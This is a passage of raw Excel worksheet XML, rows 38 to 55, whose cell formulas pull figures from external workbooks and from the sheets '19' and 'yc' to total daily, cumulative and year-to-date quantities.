        <f>'[10]20'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'19'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]20'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'19'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]20'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'19'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'19'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]20'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]20'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]20'!$R$50</f>
        <v>374.68</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'19'!U39</f>
        <v>5935.22</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>84748.819</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]20'!$V$50</f>
        <v>445</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'19'!X39</f>
        <v>6209</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>84968</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]20'!$Y$50</f>
        <v>957.766</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'19'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'19'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]20'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]20'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]20'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]20'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]20'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]20'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]20'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]20'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]20'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]20'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]20'!$E$16</f>
        <v>2181</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'19'!H41</f>
        <v>13016</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>137992</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]20'!$I$16</f>
        <v>1027.19</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'19'!K41</f>
        <v>16639.48</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>138033.02</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]20'!$L$16</f>
        <v>22506.28</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>75.0209333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]20'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]20'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]20'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'19'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]20'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'19'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]20'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]20'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]20'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'19'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]20'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'19'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]20'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]20'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]20'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]20'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'19'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]20'!$V$8</f>
        <v>703</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'19'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]20'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]20'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]20'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'19'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]20'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'19'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]20'!$L$14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'[12]20'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'19'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]20'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'19'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]20'!$L$15</f>
        <v>57613.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]20'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]20'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]20'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'19'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]20'!$V$29</f>
        <v>178</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'19'!X44</f>
        <v>3677</v>
      </c>
      <c r="Y44" s="235">
        <f>X44+yc!Y44</f>
        <v>70087</v>
      </c>
      <c r="Z44" s="238">
        <f>'[11]20'!$Y$29</f>
        <v>3879.457</v>
      </c>
    </row>
    <row r="45" ht="15.75" customHeight="1" spans="1:26">
      <c r="A45" s="191"/>
      <c r="B45" s="193"/>
      <c r="C45" s="193"/>
      <c r="D45" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E45" s="194"/>
      <c r="F45" s="194"/>
      <c r="G45" s="225">
        <f>'[12]20'!$E$55</f>
        <v>0</v>
      </c>
      <c r="H45" s="194">
        <f>G45+'19'!H45</f>
        <v>0</v>
      </c>
      <c r="I45" s="194">
        <f>H45+yc!I45</f>
        <v>0</v>
      </c>
      <c r="J45" s="225">
        <f>'[12]20'!$I$55</f>
        <v>0</v>
      </c>
      <c r="K45" s="194">
        <f>J45+'19'!K45</f>
        <v>0</v>
      </c>
      <c r="L45" s="194">
        <f>K45+yc!L45</f>
        <v>0</v>
      </c>
      <c r="M45" s="194"/>
      <c r="N45" s="195"/>
      <c r="O45" s="200"/>
      <c r="P45" s="214"/>
      <c r="Q45" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R45" s="237">
        <f>'[11]20'!$P$23</f>
        <v>0</v>
      </c>
      <c r="S45" s="238">
        <f>'[11]20'!$Q$23</f>
        <v>0</v>
      </c>
      <c r="T45" s="238">
        <f>'[11]20'!$R$23</f>
        <v>0</v>
      </c>
      <c r="U45" s="234">
        <f>'[11]20'!$S$23</f>
        <v>0</v>
      </c>
      <c r="V45" s="235">
        <f>'[11]20'!$T$23</f>
        <v>1.329</v>
      </c>
      <c r="W45" s="235">
        <f>'[11]20'!$V$23</f>
        <v>0</v>
      </c>
      <c r="X45" s="234">
        <f>'[11]20'!$W$23</f>
        <v>0</v>
      </c>
      <c r="Y45" s="235">
        <f>'[11]20'!$X$23</f>
        <v>1.329</v>
      </c>
      <c r="Z45" s="238">
        <f>'[11]20'!$Y$23</f>
        <v>0</v>
      </c>
    </row>
    <row r="46" ht="15.75" customHeight="1" spans="1:26">
      <c r="A46" s="191"/>
      <c r="B46" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C46" s="193"/>
      <c r="D46" s="193"/>
      <c r="E46" s="194"/>
      <c r="F46" s="194"/>
      <c r="G46" s="194"/>
      <c r="H46" s="194">
        <f>G46+'19'!H46</f>
        <v>0</v>
      </c>
      <c r="I46" s="194">
        <f>H46+yc!I46</f>
        <v>0</v>
      </c>
      <c r="J46" s="194">
        <f>J47+J50</f>
        <v>0</v>
      </c>
      <c r="K46" s="194">
        <f>J46+'19'!K46</f>
        <v>0</v>
      </c>
      <c r="L46" s="194">
        <f>K46+yc!L46</f>
        <v>0</v>
      </c>
      <c r="M46" s="194"/>
      <c r="N46" s="195"/>
      <c r="O46" s="200"/>
      <c r="P46" s="242" t="s">
        <v>252</v>
      </c>
      <c r="Q46" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R46" s="237">
        <f>'[12]20'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S46" s="238">
        <f>'[12]20'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T46" s="238">
        <f>'[12]20'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U46" s="234">
        <f>T46+'19'!U46</f>
        <v>0</v>
      </c>
      <c r="V46" s="234">
        <f>U46+yc!V46</f>
        <v>0</v>
      </c>
      <c r="W46" s="235">
        <f>'[12]20'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X46" s="234">
        <f>W46+'19'!X46</f>
        <v>0</v>
      </c>
      <c r="Y46" s="235">
        <f>X46+yc!Y46</f>
        <v>0</v>
      </c>
      <c r="Z46" s="238">
        <f>'[12]20'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="47" ht="15.75" customHeight="1" spans="1:26">
      <c r="A47" s="191"/>
      <c r="B47" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C47" s="193"/>
      <c r="D47" s="193"/>
      <c r="E47" s="194">
        <v>12000</v>
      </c>
      <c r="F47" s="194"/>
      <c r="G47" s="225"/>
      <c r="H47" s="194">
        <f>G47+'19'!H47</f>
        <v>0</v>
      </c>
      <c r="I47" s="194">
        <f>H47+yc!I47</f>
        <v>0</v>
      </c>
      <c r="J47" s="194">
        <f>SUM(J48:J49)</f>
        <v>0</v>
      </c>
      <c r="K47" s="194">
        <f>J47+'19'!K47</f>
        <v>0</v>
      </c>
      <c r="L47" s="194">
        <f>K47+yc!L47</f>
        <v>0</v>
      </c>
      <c r="M47" s="194"/>
      <c r="N47" s="195"/>
      <c r="O47" s="200"/>
      <c r="P47" s="243"/>
      <c r="Q47" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R47" s="237">
        <f>'[12]20'!$P$8</f>
        <v>0</v>
      </c>
      <c r="S47" s="238">
        <f>'[12]20'!$Q$8</f>
        <v>0</v>
      </c>
      <c r="T47" s="238">
        <f>'[12]20'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U47" s="234">
        <f>T47+'19'!U47</f>
        <v>0</v>
      </c>
      <c r="V47" s="234">
        <f>U47+yc!V47</f>
        <v>0</v>
      </c>
      <c r="W47" s="235">
        <f>'[12]20'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X47" s="234">
        <f>W47+'19'!X47</f>
        <v>0</v>
      </c>
      <c r="Y47" s="235">
        <f>X47+yc!Y47</f>
        <v>0</v>
      </c>
      <c r="Z47" s="238">
        <f>'[12]20'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="48" ht="15.75" customHeight="1" spans="1:26">
      <c r="A48" s="191"/>
      <c r="B48" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C48" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D48" s="193"/>
      <c r="E48" s="194"/>
      <c r="F48" s="194"/>
      <c r="G48" s="225"/>
      <c r="H48" s="194">
        <f>G48+'19'!H48</f>
        <v>0</v>
      </c>
      <c r="I48" s="194">
        <f>H48+yc!I48</f>
        <v>0</v>
      </c>
      <c r="J48" s="194"/>
      <c r="K48" s="194">
        <f>J48+'19'!K48</f>
        <v>0</v>
      </c>
      <c r="L48" s="194">
        <f>K48+yc!L48</f>
        <v>0</v>
      </c>
      <c r="M48" s="194"/>
      <c r="N48" s="195"/>
      <c r="O48" s="200"/>
      <c r="P48" s="243"/>
      <c r="Q48" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R48" s="237">
        <f>'[12]20'!$P$34</f>
        <v>0</v>
      </c>
      <c r="S48" s="238">
        <f>'[12]20'!$Q$34</f>
        <v>1585.503</v>
      </c>
      <c r="T48" s="238">
        <f>'[12]20'!$R$34</f>
        <v>0</v>
      </c>
      <c r="U48" s="234">
        <f>T48+'19'!U48</f>
        <v>555.83</v>
      </c>
      <c r="V48" s="234">
        <f>U48+yc!V48</f>
        <v>6582.36</v>
      </c>
      <c r="W48" s="235">
        <f>'[12]20'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X48" s="234">
        <f>W48+'19'!X48</f>
        <v>0</v>
      </c>
      <c r="Y48" s="235">
        <f>X48+yc!Y48</f>
        <v>0</v>
      </c>
      <c r="Z48" s="238">
        <f>'[12]20'!$Y$8</f>
        <v>0</v>
      </c>
    </row>
    <row r="49" ht="15.75" customHeight="1" spans="1:26">
      <c r="A49" s="191"/>
      <c r="B49" s="191"/>
      <c r="C49" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D49" s="193"/>
      <c r="E49" s="194"/>
      <c r="F49" s="194"/>
      <c r="G49" s="194"/>
      <c r="H49" s="194">
        <f>G49+'19'!H49</f>
        <v>0</v>
      </c>
      <c r="I49" s="194">
        <f>H49+yc!I49</f>
        <v>0</v>
      </c>
      <c r="J49" s="194"/>
      <c r="K49" s="194">
        <f>J49+'19'!K49</f>
        <v>0</v>
      </c>
      <c r="L49" s="194">
        <f>K49+yc!L49</f>
        <v>0</v>
      </c>
      <c r="M49" s="194"/>
      <c r="N49" s="195"/>
      <c r="O49" s="200"/>
      <c r="P49" s="197" t="s">
        <v>304</v>
      </c>
      <c r="Q49" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R49" s="237">
        <f>'[13]20'!$P$8</f>
        <v>15340</v>
      </c>
      <c r="S49" s="238">
        <f>'[13]20'!$Q$8</f>
        <v>10593.625</v>
      </c>
      <c r="T49" s="238">
        <f>'[13]20'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U49" s="234">
        <f>T49+'19'!U49</f>
        <v>0</v>
      </c>
      <c r="V49" s="234">
        <f>U49+yc!V49</f>
        <v>179888.95</v>
      </c>
      <c r="W49" s="235">
        <f>'[13]20'!$V$8</f>
        <v>357.98</v>
      </c>
      <c r="X49" s="234">
        <f>W49+'19'!X49</f>
        <v>501.04</v>
      </c>
      <c r="Y49" s="235">
        <f>X49+yc!Y49</f>
        <v>177031.38</v>
      </c>
      <c r="Z49" s="238">
        <f>'[13]20'!$Y$8</f>
        <v>10092.585</v>
      </c>
    </row>
    <row r="50" ht="15.75" customHeight="1" spans="1:26">
      <c r="A50" s="191"/>
      <c r="B50" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C50" s="193"/>
      <c r="D50" s="193"/>
      <c r="E50" s="194"/>
      <c r="F50" s="194"/>
      <c r="G50" s="225"/>
      <c r="H50" s="194">
        <f>G50+'19'!H50</f>
        <v>0</v>
      </c>
      <c r="I50" s="194">
        <f>H50+yc!I50</f>
        <v>0</v>
      </c>
      <c r="J50" s="194"/>
      <c r="K50" s="194">
        <f>J50+'19'!K50</f>
        <v>0</v>
      </c>
      <c r="L50" s="194">
        <f>K50+yc!L50</f>
        <v>0</v>
      </c>
      <c r="M50" s="194"/>
      <c r="N50" s="195"/>
      <c r="O50" s="200"/>
      <c r="P50" s="200"/>
      <c r="Q50" s="193" t="s">
        <v>277</v>
      </c>
      <c r="R50" s="237">
        <f>'[13]20'!$P$7</f>
        <v>200</v>
      </c>
      <c r="S50" s="238">
        <f>'[13]20'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T50" s="238">
        <f>'[13]20'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U50" s="234">
        <f>T50+'19'!U50</f>
        <v>0</v>
      </c>
      <c r="V50" s="234">
        <f>U50+yc!V50</f>
        <v>0</v>
      </c>
      <c r="W50" s="235">
        <f>'[13]20'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X50" s="234">
        <f>W50+'19'!X50</f>
        <v>0</v>
      </c>
      <c r="Y50" s="235">
        <f>X50+yc!Y50</f>
        <v>0</v>
      </c>
      <c r="Z50" s="238">
        <f>'[13]20'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="51" ht="15.75" customHeight="1" spans="1:26">
      <c r="A51" s="191" t="s">
        <v>304</v>
      </c>
      <c r="B51" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C51" s="193"/>
      <c r="D51" s="193"/>
      <c r="E51" s="194">
        <v>160000</v>
      </c>
      <c r="F51" s="194">
        <f>'[13]20'!$D$24</f>
        <v>48852.6839999998</v>
      </c>
      <c r="G51" s="225">
        <f>'[13]20'!$E$24</f>
        <v>603</v>
      </c>
      <c r="H51" s="194">
        <f>G51+'19'!H51</f>
        <v>78187.81</v>
      </c>
      <c r="I51" s="194">
        <f>H51+yc!I51</f>
        <v>1454586.81</v>
      </c>
      <c r="J51" s="194">
        <f>'[13]20'!$I$24</f>
        <v>4215.51</v>
      </c>
      <c r="K51" s="194">
        <f>J51+'19'!K51</f>
        <v>97972.179</v>
      </c>
      <c r="L51" s="194">
        <f>K51+yc!L51</f>
        <v>1461096.11</v>
      </c>
      <c r="M51" s="194">
        <f>'[13]20'!$L$24</f>
        <v>28914.5049999998</v>
      </c>
      <c r="N51" s="195">
        <f>M51/45000*100</f>
        <v>64.2544555555551</v>
      </c>
      <c r="O51" s="200"/>
      <c r="P51" s="200"/>
      <c r="Q51" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R51" s="237">
        <f>'[13]20'!$P$30</f>
        <v>8550</v>
      </c>
      <c r="S51" s="238">
        <f>'[13]20'!$Q$30</f>
        <v>3251.37400000001</v>
      </c>
      <c r="T51" s="238">
        <f>'[13]20'!$R$30</f>
        <v>0</v>
      </c>
      <c r="U51" s="234">
        <f>T51+'19'!U51</f>
        <v>3621.92</v>
      </c>
      <c r="V51" s="234">
        <f>U51+yc!V51</f>
        <v>66620.391</v>
      </c>
      <c r="W51" s="235">
        <f>'[13]20'!$V$30</f>
        <v>29</v>
      </c>
      <c r="X51" s="234">
        <f>W51+'19'!X51</f>
        <v>3309.688</v>
      </c>
      <c r="Y51" s="235">
        <f>X51+yc!Y51</f>
        <v>63925.925</v>
      </c>
      <c r="Z51" s="238">
        <f>'[13]20'!$Y$30</f>
        <v>3563.60600000001</v>
      </c>
    </row>
    <row r="52" ht="15.75" customHeight="1" spans="1:26">
      <c r="A52" s="191"/>
      <c r="B52" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C52" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D52" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E52" s="194">
        <v>175000</v>
      </c>
      <c r="F52" s="194">
        <f>'[13]20'!$D$19</f>
        <v>105046.44300005</v>
      </c>
      <c r="G52" s="225">
        <f>'[13]20'!$E$19</f>
        <v>1614.33000000002</v>
      </c>
      <c r="H52" s="194">
        <f>G52+'19'!H52</f>
        <v>1999.1900000004</v>
      </c>
      <c r="I52" s="194">
        <f>H52+yc!I52</f>
        <v>1385566.44</v>
      </c>
      <c r="J52" s="194">
        <f>'[13]20'!$I$19</f>
        <v>469</v>
      </c>
      <c r="K52" s="194">
        <f>J52+'19'!K52</f>
        <v>74930.495</v>
      </c>
      <c r="L52" s="194">
        <f>K52+yc!L52</f>
        <v>1356624.695</v>
      </c>
      <c r="M52" s="194">
        <f>'[13]20'!$L$19</f>
        <v>32115.1380000506</v>
      </c>
      <c r="N52" s="207">
        <f>(M52+M53)/(65000+80000)*100</f>
        <v>22.1483710345176</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'[13]20'!$D$22</f>
        <v>0</v>
      </c>
      <c r="G53" s="225">
        <f>'[13]20'!$E$22</f>
        <v>0</v>
      </c>
      <c r="H53" s="194">
        <f>G53+'19'!H53</f>
        <v>0</v>
      </c>
      <c r="I53" s="194">
        <f>H53+yc!I53</f>
        <v>0</v>
      </c>
      <c r="J53" s="194">
        <f>'[13]20'!$I$22</f>
        <v>0</v>
      </c>
      <c r="K53" s="194">
        <f>J53+'19'!K53</f>
        <v>0</v>
      </c>
      <c r="L53" s="194">
        <f>K53+yc!L53</f>
        <v>0</v>
      </c>
      <c r="M53" s="194">
        <f>'[13]20'!$L$23</f>
        <v>0</v>
      </c>
      <c r="N53" s="212"/>
      <c r="O53" s="200"/>
      <c r="P53" s="223" t="s">
        <v>262</v>
      </c>
      <c r="Q53" s="193" t="s">
        <v>279</v>
      </c>
      <c r="R53" s="245"/>
      <c r="S53" s="237">
        <f>'[14]20'!$M$21+'[14]20'!$M$22+'[14]20'!$M$35</f>
        <v>1648.947</v>
      </c>
      <c r="T53" s="237">
        <f>'[14]20'!$N$21+'[14]20'!$N$22+'[14]20'!$N$35</f>
        <v>0</v>
      </c>
      <c r="U53" s="234">
        <f>T53+'19'!U53</f>
        <v>924.05</v>
      </c>
      <c r="V53" s="234">
        <f>U53+yc!V53</f>
        <v>39258.477</v>
      </c>
      <c r="W53" s="237">
        <f>'[14]20'!$Q$21+'[14]20'!$Q$22+'[14]20'!$Q$35</f>
        <v>0</v>
      </c>
      <c r="X53" s="234">
        <f>W53+'19'!X53</f>
        <v>739</v>
      </c>
      <c r="Y53" s="235">
        <f>X53+yc!Y53</f>
        <v>40230</v>
      </c>
      <c r="Z53" s="237">
        <f>'[14]20'!$T$21+'[14]20'!$T$22+'[14]20'!$T$35</f>
        <v>1833.997</v>
      </c>
    </row>
    <row r="54" ht="15.75" customHeight="1" spans="1:26">
      <c r="A54" s="191"/>
      <c r="B54" s="193"/>
      <c r="C54" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D54" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E54" s="194"/>
      <c r="F54" s="194"/>
      <c r="G54" s="225">
        <f>'[13]20'!$E$23</f>
        <v>0</v>
      </c>
      <c r="H54" s="194">
        <f>G54+'19'!H54</f>
        <v>0</v>
      </c>
      <c r="I54" s="194">
        <f>H54+yc!I54</f>
        <v>0</v>
      </c>
      <c r="J54" s="194">
        <f>'[13]20'!$I$47</f>
        <v>0</v>
      </c>
      <c r="K54" s="194">
        <f>J54+'19'!K54</f>
        <v>10672.645</v>
      </c>
      <c r="L54" s="194">
        <f>K54+yc!L54</f>
        <v>222114.495</v>
      </c>
      <c r="M54" s="194">
        <f>'[13]20'!$L$22</f>
        <v>0</v>
      </c>
      <c r="N54" s="195"/>
      <c r="O54" s="200"/>
      <c r="P54" s="246" t="s">
        <v>263</v>
      </c>
      <c r="Q54" s="242" t="s">
        <v>279</v>
      </c>
      <c r="R54" s="247">
        <f>'[15]20'!$C$43</f>
        <v>0</v>
      </c>
      <c r="S54" s="247">
        <f>'[15]20'!$D$43</f>
        <v>467.66</v>
      </c>
      <c r="T54" s="247">
        <f>'[15]20'!$E$43</f>
        <v>0</v>
      </c>
      <c r="U54" s="234">
        <f>T54+'19'!U54</f>
        <v>0</v>
      </c>
      <c r="V54" s="248">
        <f>U54+yc!V54</f>
        <v>0</v>
      </c>
      <c r="W54" s="249">
        <f>'[15]20'!$H$43</f>
        <v>0</v>
      </c>
      <c r="X54" s="234">
        <f>W54+'19'!X54</f>
        <v>0</v>
      </c>
      <c r="Y54" s="250">
        <f>X54+yc!Y54</f>
        <v>0</v>
      </c>
      <c r="Z54" s="247">
        <f>'[15]20'!$K$43</f>
        <v>467.66</v>
      </c>
    </row>
    <row r="55" ht="15.75" customHeight="1" spans="1:26">
      <c r="A55" s="191"/>
      <c r="B55" s="193"/>
      <c r="C55" s="193"/>
      <c r="D55" s="193" t="s">
        <v>251</v>
      </c>
      <c r="E55" s="194"/>
      <c r="F55" s="194"/>
      <c r="G55" s="225">
        <f>'[13]20'!$E$63</f>
        <v>0</v>
      </c>
      <c r="H55" s="194">
        <f>G55+'19'!H55</f>
        <v>0</v>
      </c>
      <c r="I55" s="194">
        <f>H55+yc!I55</f>
        <v>0</v>
      </c>
      <c r="J55" s="225">
        <f>'[13]20'!$I$63</f>
        <v>0</v>
      </c>
      <c r="K55" s="194">
        <f>J55+'19'!K55</f>
        <v>5738.81</v>
      </c>
      <c r="L55" s="194">
        <f>K55+yc!L55</f>
        <v>41174.46</v>
      </c>
      <c r="M55" s="194"/>
      <c r="N55" s="195"/>
      <c r="O55" s="200"/>
      <c r="P55" s="251" t="s">
        <v>310</v>
      </c>
      <c r="Q55" s="252" t="s">
        <v>279</v>
      </c>
      <c r="R55" s="253">
        <f>'[16]20'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S55" s="253">
        <f>'[16]20'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T55" s="253">
        <f>'[16]20'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U55" s="254">
